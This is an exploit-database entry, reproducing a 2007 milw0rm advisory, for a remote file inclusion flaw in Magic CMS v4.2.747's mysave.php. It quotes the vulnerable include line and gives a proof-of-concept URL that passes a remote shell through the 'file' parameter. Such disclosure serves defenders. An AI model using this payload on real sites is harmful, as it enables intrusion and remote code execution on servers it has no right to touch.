Magic CMS v4.2.747 (mysave.php) Remote File Inclusion

vendor:

Magic CMS

by:

DNX

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Magic CMS

Affected Version From: Magic CMS v4.2.747

Affected Version To: Magic CMS v4.2.747

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Magic CMS v4.2.747 (mysave.php) Remote File Inclusion

The vulnerability exists in the mysave.php file of Magic CMS v4.2.747. It allows an attacker to include a remote file by manipulating the 'file' parameter in the URL. This vulnerability can only be exploited when the 'register_globals' setting is turned on. The vulnerability is discovered by DNX and reported on 03.03.2007. The PoC URL to exploit this vulnerability is 'http://[site]/[path]/mysave.php?file=[shell]'. The vendor, www.geo-soft.net/de-ch/, has not provided a patch or update for this vulnerability.

Mitigation:

Waiting for patch/update. No response from vendor.

Source

Exploit-DB raw data:

                             \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.

# milw0rm.com [2007-03-08]